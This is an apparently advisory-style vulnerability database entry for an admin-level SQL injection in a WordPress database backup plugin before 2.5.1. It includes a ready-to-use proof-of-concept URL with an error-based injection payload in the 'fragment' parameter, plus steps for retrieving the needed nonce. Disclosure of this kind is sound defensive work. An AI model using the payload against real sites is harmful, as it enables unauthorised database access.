Lucene search

K
wpexploitJrXnmWPEX-ID:684BB06D-864F-4CBA-AB0D-F83974D026FA
HistoryJan 24, 2022 - 12:00 a.m.

Database Backup for WordPress < 2.5.1 - Admin+ SQL Injection

2022-01-2400:00:00
JrXnm
88
wordpress
database backup
admin
sql injection
nonce
scheduled backup
plugin

EPSS

0.001

Percentile

37.7%

The plugin does not properly sanitise and escape the fragment parameter before using it in a SQL statement in the admin dashboard, leading to a SQL injection issue

https://example.com/wp-admin/?fragment=select%20updatexml(1,concat(0x7e,(select%20user())),0)::2.txt&_wpnonce=7347278aca

The nonce can be retrieved from the "Backup Now" and "Scheduled Backup" tabs of the plugin (/wp-admin/tools.php?page=wp-db-backup), look for action=save_backup_time&_wpnonce= in the source

EPSS

0.001

Percentile

37.7%

Related for WPEX-ID:684BB06D-864F-4CBA-AB0D-F83974D026FA